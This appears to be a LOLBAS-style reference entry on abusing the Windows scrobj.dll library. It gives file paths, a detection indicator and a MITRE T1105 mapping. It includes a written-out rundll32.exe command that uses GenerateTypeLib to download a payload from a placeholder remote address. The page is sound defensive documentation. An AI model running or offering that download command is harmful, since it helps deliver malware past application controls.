.. /Scrobj.dll
Star

Download

Windows Script Component Runtime

Paths:

c:\windows\system32\scrobj.dll
c:\windows\syswow64\scrobj.dll

Resources:

https://twitter.com/eral4m/status/1479106975967240209

Acknowledgements:

Eral4m (@eral4m)

Detection:

IOC: Execution of rundll32.exe with 'GenerateTypeLib' and a protocol handler ('://') on the command line

Download

Once executed, rundll32.exe will download the file at the URL in the command to %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\<random>\payload[1].exe.

rundll32.exe C:\Windows\System32\scrobj.dll,GenerateTypeLib http://x.x.x.x/payload.exe

Usecase: Download file from remote location.
Privileges required: User
OS: Windows 10, Windows 11
MITRE ATT&CK®: T1105

.. /Scrobj.dll Star

Download

.. /Scrobj.dll
Star